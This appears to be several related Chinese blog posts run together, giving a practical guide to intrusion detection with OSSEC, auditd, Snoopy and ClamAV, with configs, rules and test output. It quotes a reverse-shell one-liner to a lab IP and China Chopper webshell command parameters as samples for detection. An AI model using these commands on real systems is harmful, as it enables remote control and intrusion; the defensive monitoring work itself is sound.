    - group: root

    - mode: 644

    - template: jinja

    - require:

      - cmd: install_ossec



/var/ossec/monitor.sh:

  file.managed:

    - source: salt://ossec/conf/monitor.sh

    - user: root

    - group: root

    - mode: 755

    - template: jinja

    - require:

      - cmd: install_ossec



/root/Downloads/ossec.tar.gz:

  file.managed:

    - source: salt://ossec/ossec.tar.gz

    - user: root

    - group: root

    - mode: 755

    - template: jinja

    - require:

      - file: /root/Downloads



agentauth:

  cmd.run:

    - name: /var/ossec/bin/agent-auth -m 10.59.0.248 -p 1515 -A $(ifconfig | egrep -o '10\.(59|211|200).[0-9]{1,3}.[0-9]{1,3}' | head -n 1)

    - unless: test -s /var/ossec/etc/client.keys

    - require:

      - cmd: install_ossec



serverstart:

  cmd.run:

    - name: /var/ossec/bin/ossec-control restart

    - onchanges:

      - file: /var/ossec/etc/ossec.conf

    - require:

      - cmd: install_ossec

 

0x04 MySQL和WebUI安装


MySQL安装:

2.9之前的版本可以先执行make setdb再编译OSSEC来开启MySQL支持;默认的安装脚本install.sh不支持MySQL,所以需要在源码的src目录下执行

make TARGET=server DATABASE=mysql install

然后执行

/var/ossec/bin/ossec-control enable database

创建数据库和导入表结构

mysql> create database ossec;

Query OK, 1 row affected (0.00 sec)



mysql> grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossec@127.0.0.1;

Query OK, 0 rows affected (0.00 sec)



mysql> set password for ossec@127.0.0.1=PASSWORD('hehe123');

Query OK, 0 rows affected (0.00 sec)



mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)



mysql> quit



[root@localhost ossec]# mysql -u root -phehe123 -D ossec < /tmp/ossec-hids-2.9.0/src/os_dbd/mysql.schema

在ossec.conf中添加配置

    <database_output>

        <hostname>127.0.0.1</hostname>

        <username>ossec</username>

        <password>hehe123</password>

        <database>ossec</database>

        <type>mysql</type>

    </database_output>

然后重启服务。

/var/ossec/bin/ossec-dbd启动成功。

[root@localhost logs]# ps axu | grep dbd | grep -v grep

ossecm    3919  0.0  0.0  51172  2872 ?        S    10:00   0:00 /var/ossec/bin/ossec-dbd

尝试SSH登录失败,看一下入库信息。

mysql> select * from alert a join location l on a.location_id = l.id where l.id = 5\G

*************************** 1. row ***************************

         id: 9

  server_id: 1

    rule_id: 5503

      level: 5

  timestamp: 1499415795

location_id: 5

     src_ip: 192.168.192.120

     dst_ip: (null)

   src_port: 0

   dst_port: 0

    alertid: 1499415795.28052

       user: root

   full_log: Jul  7 16:23:14 localhost sshd[1589]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.192.120  user=root

  is_hidden: 0

        tld:

         id: 5

  server_id: 1

       name: (192.168.192.196) any->/var/log/secure

*************************** 2. row ***************************

         id: 10

  server_id: 1

    rule_id: 5716

      level: 5

  timestamp: 1499415800

location_id: 5

     src_ip: 192.168.192.120

     dst_ip: (null)

   src_port: 0

   dst_port: 0

    alertid: 1499415797.28415

       user: root

   full_log: Jul  7 16:23:16 localhost sshd[1589]: Failed password for root from 192.168.192.120 port 47519 ssh2

  is_hidden: 0

        tld:

         id: 5

  server_id: 1

       name: (192.168.192.196) any->/var/log/secure

2 rows in set (0.00 sec)

WebUI安装

安装步骤如下:

1)yum -y install gcc gcc-c++ apr-devel apr-util-devel pcre pcre-devel openssl openssl-devel

2)安装apr(version >= 1.4+  )

# wget http://mirrors.tuna.tsinghua.edu.cn/apache/apr/apr-1.5.2.tar.gz

# tar zxf apr-1.5.2.tar.gz

# cd apr-1.5.2

# ./configure --prefix=/usr/local/apr

# make && make install

3)安装apr-util(version >= 1.4+ )

# wget http://mirrors.tuna.tsinghua.edu.cn/apache/apr/apr-util-1.5.4.tar.gz

# tar zxf apr-util-1.5.4.tar.gz

# cd apr-util-1.5.4

# ./configure --prefix=/usr/local/apr-util --with-apr=/usr/local/apr

# make && make install

4)安装httpd-2.4.27

# cd httpd-2.4.27

# ./configure --prefix=/usr/local/apache --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr-util --enable-dav --enable-so --enable-maintainer-mod --enable-rewrite

# make && make install

5)安装ossec-wui

[root@localhost tmp]# wget https://github.com/ossec/ossec-wui/archive/0.9.tar.gz

[root@localhost tmp]# tar zxvf ossec-wui-0.9.tar.gz

[root@localhost tmp]# mv ossec-wui-0.9 /var/www/html/ossec-wui

[root@localhost tmp]# cd /var/www/html/ossec-wui

[root@localhost ossec-wui]# ./setup.sh

Setting up ossec ui...



Username: vincent

New password:

Re-type new password:

Adding password for user vincent

Enter your web server user name (e.g. apache, www, nobody, www-data, ...)

apache

You must restart your web server after this setup is done.



Setup completed successfully.

[root@localhost ossec-wui]# service httpd start

 

0x05 监控扩展


综合上述OSSEC的一些功能点,我们可以扩展一些其他的监控进来,通过OSSEC告警。这里我举几个例子:

1)存在连接的Bash进程

通常情况下Bash进程本身不会持有网络连接,持有连接的是其父进程SSHD,如下:

[root@sec248 cron.daily]# ps -ef | grep bash | grep -v grep

root     41011 41009  0 08:42 pts/4    00:00:00 -bash

root     45984 45982  0 Dec21 pts/1    00:00:00 -bash

[root@sec248 cron.daily]# netstat -antlp | grep sshd | grep EST

tcp        0     64 10.59.0.248:22              192.168.190.201:52947       ESTABLISHED 41009/sshd         

tcp        0      0 10.59.0.248:22              192.168.190.201:2164        ESTABLISHED 45982/sshd

而反弹shell时,反弹命令bash -i >& /dev/tcp/192.168.192.144/2345 0>&1,我们看一下反弹连接

[root@server120 ~]# netstat -antlp | grep bash

tcp        0      0 192.168.192.120:34710       192.168.192.144:2345        ESTABLISHED 15497/bash

可以看到存在Bash连接,那么我们添加OSSEC的监控项

  <localfile>

    <log_format>full_command</log_format>

    <command>netstat -antlp | grep ESTABLISHED | egrep '/(bash|sh)'</command>

  </localfile>
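
Server端可以参照前面netstat规则的写法,在local_rules.xml中补一条对应的规则(规则ID取自本地自定义区间,仅为示例),当命令输出发生变化(出现或消失Bash连接)时告警:

  <rule id="100101" level="10">
    <if_sid>530</if_sid>
    <match>ossec: output: 'netstat -antlp</match>
    <check_diff />
    <description>Bash process with established connection (possible reverse shell).</description>
  </rule>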

2)ssdeep检测webshell

【企业安全实战】inotify实现webshell监控部署实践

3)Auditd监控Web中间件

【企业安全实战】Web中间件EXECVE审计

4)ClamAV查杀部署

Linux下部署ClamAV并结合OSSEC告警

0x01 概述


企业安全建设中非常重要的一项工作就是入侵感知体系建设。不同于WAF、IPS、IDS等网络层的安全防护检测,入侵感知体系更偏向于被入侵后的异常行为发现,即当你的机器已经被黑掉后,你能否第一时间发现并定位到哪里出了问题。Web中间件的系统命令调用监控是我认为入侵感知中性价比较高的一项监控措施,当然也可以把它算作HIDS的一项功能。

举个例子,记得S2-045爆出来的时候,公司的不少站点都受到了影响。即便当时安全、运维和开发的响应速度够快,排查了受影响的项目并替换了Jar包,但还是有部分机器受到了影响。通过这项监控,我可以清楚地定位到哪些机器已经被黑、攻击者执行了什么,心里有底,不至于盲目地去排查。

我目前在用的方案是通过Linux系统自带的Auditd服务来监控系统的EXECVE调用,并联动OSSEC告警。另外也可以使用开源工具Snoopy,我们之前提到过用它做Bash命令审计,也见到过有的公司运维直接用Snoopy来做审计,不过看到有国外用户评论说它可能会影响系统的稳定性,所以暂时没有在生产环境测试。

下面我们就详细说一下Auditd和Snoopy这两项监控方式。

 

0x02 Auditd


auditd服务是Linux自带的审计系统,用来记录审计信息,从安全的角度可以用于对系统安全事件的监控。

auditd服务的配置文件位于/etc/audit/audit.rules,其中每个规则和观察器必须单独在一行中。语法如下:

-a <list>,<action> <options>

<list>配置如下:

task

每个任务的列表。只有当创建任务时才使用。只有在创建时就已知的字段(比如UID)才可以用在这个列表中。

entry

系统调用条目列表。当进入系统调用确定是否应创建审计时使用。

exit

系统调用退出列表。当退出系统调用以确定是否应创建审计时使用。

user

用户消息过滤器列表。内核在将用户空间事件传递给审计守护进程之前使用这个列表过滤用户空间事件。有效的字段只有uid、auid、gid和pid。

exclude

事件类型排除过滤器列表。用于过滤管理员不想看到的事件。用msgtype字段指定您不想记录到日志中的消息。

<action>配置如下:

never

不生成审计记录。

always

分配审计上下文,总是把它填充在系统调用条目中,总是在系统调用退出时写一个审计记录。如果程序使用了这个系统调用,则开始一个审计记录。

<options>配置如下:

-S <syscall>

根据名称或数字指定一个系统。要指定所有系统调用,可使用all作为系统调用名称。

-F <name[=,!=,<,>,<=]value>

指定一个规则字段。如果为一个规则指定了多个字段,则只有所有字段都为真才能启动一个审计记录。每个规则都必须用-F启动,最多可以指定64个规则。

常用的字段如下:

pid

进程ID。

ppid

父进程的进程ID。

uid

用户ID。

gid

组ID。

msgtype

消息类型号。只应用在排除过滤器列表上。

arch

系统调用的处理器体系结构。指定精确的体系结构,比如i686(可以通过uname -m命令检索)或者指定b32来使用32位系统调用表,或指定b64来使用64位系统调用表。

...

下面我们编写测试Java命令监控规则

Jboss的启动账户为nobody,添加审计规则

# grep '\-a' /etc/audit/audit.rules

-a exclude,always -F msgtype=CONFIG_CHANGE

-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

重启服务

# service auditd restart

Stopping auditd:                                           [  OK  ]

Starting auditd:                                           [  OK  ]

使用菜刀马测试:

菜刀马传递的参数为

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

所执行的程序如下:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

审计日志如下:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F7072.....

然后对照着日志时间戳去找对应的Nginx Access Log中的请求即可定位到webshell。

这里我们添加的规则是针对uid=99的nobody账户,而针对一些环境jboss的启动账户和运维的操作账户相同的情况,可以针对ppid来监控。
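
例如,假设Jboss主进程的PID为1234(实际环境中先用ps查出来;进程重启后PID会变化,所以这种写法更适合临时排查,arch按实际环境选择b32或b64),可以用auditctl临时添加一条规则:

auditctl -a exit,always -F arch=b64 -F ppid=1234 -S execve -k webshell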

 

0x03 snoopy


项目地址:https://github.com/a2o/snoopy

安装步骤如下:

rm -f snoopy-install.sh &&

wget -O snoopy-install.sh https://github.com/a2o/snoopy/raw/install/doc/install/bin/snoopy-install.sh &&

chmod 755 snoopy-install.sh &&

./snoopy-install.sh stable

输出日志:

SNOOPY INSTALL: Starting installation, log file: /tmp/snoopy-install.log

SNOOPY INSTALL: Installation mode: package-latest-stable

SNOOPY INSTALL: Getting latest Snoopy version... got it, 2.4.6

SNOOPY INSTALL: Downloading from http://source.a2o.si/download/snoopy/snoopy-2.4.6.tar.gz... done.

SNOOPY INSTALL: Unpacking ./snoopy-2.4.6.tar.gz... done.

SNOOPY INSTALL: Configuring... done.

SNOOPY INSTALL: Building... done.

SNOOPY INSTALL: Installing... done.

SNOOPY INSTALL: Enabling... done.



SNOOPY LOGGER is now installed and enabled.



TIP #1: If Snoopy is to be enabled for all processes, you need

        to restart your system, or at least all services on it.

// 如果想要Snoopy作用于所有进程,那么需要重启服务器

TIP #2: If you ever need to disable Snoopy, you should use provided

        'snoopy-disable' script. Use 'snoopy-enable' to reenable it.

// 可以snoopy-disable来关掉监控,使用snoopy-enable来开启监控

TIP #3: Snoopy output can usually be found somewhere in /var/log/*

        Check your syslog configuration for details.:

// Snoopy的日志文件位于/var/log/*

TIP #4: Configuration file location: /etc/snoopy.ini

        See included comments for additional configuration options.

// 配置文件/etc/snoopy.ini

Snoopy wishes you a happy logging experience:)

安装完成后会在/usr/local/lib目录下创建libsnoopy.so文件

[root@template log]# ls -alt /usr/local/lib | head -n 10

总用量 8512

drwxr-xr-x.  5 root root    4096 6月   4 11:22 .

-rwxr-xr-x.  1 root root     959 6月   4 11:22 libsnoopy.la

lrwxrwxrwx.  1 root root      18 6月   4 11:22 libsnoopy.so -> libsnoopy.so.0.0.0

lrwxrwxrwx.  1 root root      18 6月   4 11:22 libsnoopy.so.0 -> libsnoopy.so.0.0.0

-rwxr-xr-x.  1 root root  218012 6月   4 11:22 libsnoopy.so.0.0.0

并在/etc/ld.so.preload里加入/usr/local/lib/libsnoopy.so

[root@template log]# cat /etc/ld.so.preload

/usr/local/lib/libsnoopy.so

默认会输出在/var/log/secure

[root@template ~]# tail -n 1 /var/log/secure

Jun  4 16:48:04 template snoopy[2024]: [uid:0 sid:1499 tty:/dev/pts/1 cwd:/root filename:/usr/bin/tail]: tail -n 1 /var/log/secure

执行snoopy-disable

[root@template ~]# snoopy-disable

SNOOPY: Removing from /etc/ld.so.preload: /usr/local/lib/libsnoopy.so

SNOOPY: Disabled.

SNOOPY: Hint: Your system needs to be restarted to finish Snoopy cleanup.

执行snoopy-enable

[root@template ~]# snoopy-enable

SNOOPY: Adding to /etc/ld.so.preload:     /usr/local/lib/libsnoopy.so

SNOOPY: Hint #1: Reboot your machine to load Snoopy system-wide.

SNOOPY: Hint #2: Check your log files for output.

SNOOPY: Enabled.

我们来看下/etc/snoopy.ini中的配置项,日志格式可以自己定义,默认的日志格式如下

; Default value:

;   "[uid:%{uid} sid:%{sid} tty:%{tty} cwd:%{cwd} filename:%{filename}]: %{cmdline}"

可以定制一些过滤条件,例如

; List of available filters:

; - exclude_spawns_of   ; (available=yes) Exclude log entries that occur in specified process trees

; - exclude_uid         ; (available=yes) Exclude these UIDs from logging

; - only_root           ; (available=yes) Only log root commands

; - only_tty            ; (available=yes) Only log commands associated with a TTY

; - only_uid            ; (available=yes) Only log commands executed by these UIDs

可以指定Syslog的Facility

; Default value:

;   LOG_AUTHPRIV

可以指定Syslog的Level

; Default value:

;   LOG_INFO

这里我们测试一下,修改/etc/snoopy.ini配置:

syslog_facility = LOG_LOCAL6

在/etc/rsyslog.conf添加一条配置

local6.info                                             /tmp/snoopy.log

重启rsyslog服务

[root@template ~]# service rsyslog restart

然后我们看下输出

[root@template ~]# tail -n 1 /tmp/snoopy.log

Jun  4 17:00:30 template snoopy[2141]: [uid:0 sid:2068 tty:/dev/pts/2 cwd:/root filename:/usr/bin/tail]: tail -n 1 /tmp/snoopy.log

同样也可以修改rsyslog的配置输出到日志中心。

 

0x04 OSSEC告警配置


这里我使用的是OSSEC监控/var/log/audit/audit.log日志

OSSEC本身已经包含了auditd事件的解码规则,例如:

<decoder name="auditd">

  <prematch>^type=</prematch>

</decoder>

.......

但是在RULES里面没有找到现成的规则,编辑local_rules.xml,新增

<group name="syslog,auditd,">

  <rule id="110000" level="0" noalert="1">

    <decoded_as>auditd</decoded_as>

    <description>AUDITD messages grouped.</description>

  </rule>

  <rule id="110001" level="10">

    <if_sid>110000</if_sid>

    <match>EXECVE</match>

    <description>Java execution command</description>

  </rule>

</group>

测试

[root@localhost ossec]# ./bin/ossec-logtest

2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.

2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).

ossec-testrule: Type one log per line.



type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"





**Phase 1: Completed pre-decoding.

       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

       hostname: 'localhost'

       program_name: '(null)'

       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'



**Phase 2: Completed decoding.

       decoder: 'auditd'



**Phase 3: Completed filtering (rules).

       Rule id: '110001'

       Level: '10'

       Description: 'Java execution command'

**Alert to be generated.

然后在Agent端添加监控文件

  <localfile>

    <log_format>syslog</log_format>

    <location>/var/log/audit/audit.log</location>

  </localfile>

然后jspspy执行系统命令,可以看到告警如下

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log

** Alert 1500280231.400419: mail  - syslog,auditd,

2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log

Rule: 110001 (level 10) -> 'Java execution command'

type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

这里还需考虑的一个问题是白名单,例如公司的一些站点本身就会调用视频处理的一些功能,也会调用系统命令。所以为了避免误报,需要新增一个白名单功能。

这里我们修改一下local_rules.xml,新增白名单规则,并且放到EXECVE规则上面。

<group name="syslog,auditd,">

  <rule id="110000" level="0" noalert="1">

    <decoded_as>auditd</decoded_as>

    <description>AUDITD messages grouped.</description>

  </rule>

  <rule id="110001" level="0">

    <if_sid>110000</if_sid>

    <regex>whoami|passwd</regex>

    <description>Java execution white list</description>

  </rule>

  <rule id="110002" level="10">

    <if_sid>110000</if_sid>

    <match>EXECVE</match>

    <description>Java execution command</description>

  </rule>

</group>

如上所示,执行whoami和cat /etc/passwd的时候不会产生告警。

 

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

安装完成后,需要升级病毒库。
升级程序为/usr/bin/freshclam。
默认的配置文件为/etc/freshclam.conf,内容如下

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav #病毒库的位置
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net #病毒同步的请求地址

这里修改一下配置文件:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

然后更新一下病毒库

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

其中daily.cld与daily.cvd内容相同,只不过daily.cvd是个压缩文件,而daily.cld不是。
freshclam会判断自从上一次检测后是否有新的更新,如果有则先尝试下载增量的diff文件;如果diff文件无法下载,则会下载一个完整的最新daily.cvd。

ClamAV会添加一个每日定时任务/etc/cron.daily/freshclam来更新病毒库文件。

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

 

病毒库更新完成后,执行扫描任务。
这里的想法是OSSEC本身已经有了clamav扫描结果的解码和rule文件
etc/decoder.xml如下:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml如下:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

通过decoder可以看到这里匹配的是Syslog头中的程序名为clamd,也就是说日志必须是syslog格式才能解析并告警,而clamscan默认的-l参数输出的是非syslog格式,测试如下:
test目录下包含了一些测试样本,我把之前应急响应时拿到的一个样本文件拷贝到了/tmp下

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

查看/var/log/clamav.log,可以看到非Syslog格式

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

通过查看/etc/clamd.conf可以看到里面有参数LogSyslog

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

可以配置开启syslog,默认输出到local6,但是测试发现这个配置文件不是默认加载的,写进去的配置无法生效,所以这里用logger来输出syslog。
修改一下rsyslog的配置

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages #添加local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

这里我们用OSSEC监控一下这个文件,添加配置

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

可以看到产生的告警如下:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

这里另外需要考虑四个问题
1)如何添加病毒库白名单
在病毒库所在目录创建文件:whitelist-signatures.ign2
以脏牛为例,添加内容:Unix.Exploit.CVE_2016_5195-2

2)文件软链问题,是否会重复扫描。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0表示不检测软链;1表示需要向clamscan传递参数指定文件;2表示检测软链。默认值为1。
这里创建软链测试一下

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

当指定follow-file-symlinks=0时,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,不传递参数,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,传递参数/tmp/makeudp,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=2时,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

所以默认就不会扫描软链文件。
3)很多机器都挂载了存储,需要排除存储目录。
可以通过--exclude-dir="^/sys"来排除掉。
将10和192开头的挂载点排除掉,如下所示:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4)因为是定时任务每天凌晨执行,如果扫描到了存储设备,很有可能一天扫描不完,需要做判断,如果扫描任务还存在则不扫描;另外针对这种扫描时间超长的事件也需要告警出来,所以需要新增ossec的检测规则扫描时间超过6小时告警。
rules/clam_av_rules.xml新增:

  <rule id="52510" level="7">
      <if_sid>52500</if_sid>
      <match>Time: </match>      
      <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
      <description>ClamAV scan time over 6hours</description>
  </rule>

PS:这里的正则写成\d{4}不行,[1-9]也不行,都无法匹配到,因为OSSEC使用自带的os_regex语法,不支持{}量词和[ ]字符区间,只能像上面那样枚举。
然后测试一下OSSEC告警:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.

 

最终执行的定时任务脚本如下:

#!/bin/bash

# 排除目录(正则),/proc、/sys以及部分业务目录
WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"
# 如果上一次的扫描任务还没结束则直接退出
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi
# 将10.和192.开头的挂载点也加入排除列表
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

if [[ -n $NFSDIR ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi
# 全盘扫描,结果通过logger以syslog形式输出,供OSSEC解析
COMMAND="/usr/bin/clamscan  -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd  -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi
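
把上面的脚本保存后加入crontab即可,例如每天凌晨1点执行(脚本路径为假设):

0 1 * * * /usr/local/bin/clamscan_cron.sh >/dev/null 2>&1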

 

OSSEC是一款开源的跨平台入侵检测系统,可以运行于Windows、Linux、OpenBSD/FreeBSD以及MacOS等操作系统中,主要功能包括日志分析、完整性检测、rootkit检测等。

1. 测试和验证OSSEC泛化及告警规则

OSSEC默认具有一个ossec-logtest工具用于测试OSSEC的泛化及告警规则。该工具一般默认安装于目录 /var/ossec/bin 中。

使用示例:

 

/var/ossec/bin/ossec-logtest
2014/06/11 13:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

如上文所示,当输入日志内容:

Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

该条日志经过三步处理,生成了一条4级告警,规则ID为10100,内容为“First time user logged in.”

使用ossec-logtest -v命令,可获取更详细的日志分析逻辑。

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. 自定义日志泛化规则
2.1 添加日志源

添加日志源的方式很简单,通过修改/var/ossec/etc/ossec.conf 即可实现。

如果日志源是本地文件,可通过添加如下配置实现。

